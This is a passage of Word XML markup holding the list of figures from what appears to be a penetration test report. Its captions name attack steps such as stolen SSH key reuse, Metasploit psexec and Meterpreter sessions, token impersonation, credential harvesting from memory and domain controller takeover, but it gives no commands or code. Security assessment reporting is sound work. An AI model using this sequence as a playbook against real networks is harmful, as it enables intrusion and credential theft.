          </w:tcPr>
          <w:p w14:paraId="75F7CF70" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">19 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EDDF526" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 17: Authenticating to Multiple Systems Using a Stolen SSH Private Key </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64127736" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 22 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33744C9A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="2CD971EF"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412848D5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="417EE8DF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 18: Viewing Active Sessions Created by the Metasploit Module </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CB89684" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 23 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10732830" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="7271245E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CF4B604" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">21 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="42F78946" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 19: RDP Session from Goku to Nappa Using Test User 1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D5A29C2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 25 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7700BD75" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="4FC6F1B0"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798D1584" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">22 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="347F7465" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 20: Identifying Logged-In User Using the Metasploit psexec_loggedin_user Module </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18A121E2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 26 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="789D90BF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="71ECD08B"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1E32C1FC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">23 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C489A3F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 21: Opening a Meterpreter Session Using the exploit/windows/smb/psexec Module </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2852111F" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 26 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F678882" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="14BC54CF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2509654D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">24 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="747FF7BD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="31" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 22: Impersonating a Domain User Token Using the Incognito Extension </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C4FF369" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 27 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5239F6C2" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="023AD4E6"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180E44FF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">25 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76799C29" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 23: Harvesting clear-text credentials from memory </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3268D392" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 28 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A89597C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="5B480117"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26062FEE" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">26 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56699607" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Diagram 5: Controlling the entire Active Directory domain </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BAD6FD9" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 28 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37A8A17D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="3084E08D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="745EB089" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">27 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FA76829" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 24: Identifying the domain controller using a domain ping </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0453D86C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Page 29 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1598" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FA24D86" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">100 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="36ABA8FC"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74A75703" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">28 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="52C20D78" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Figure 25: Checking the domain controller for existing Volume Shadow Copies </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1676" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF"/>
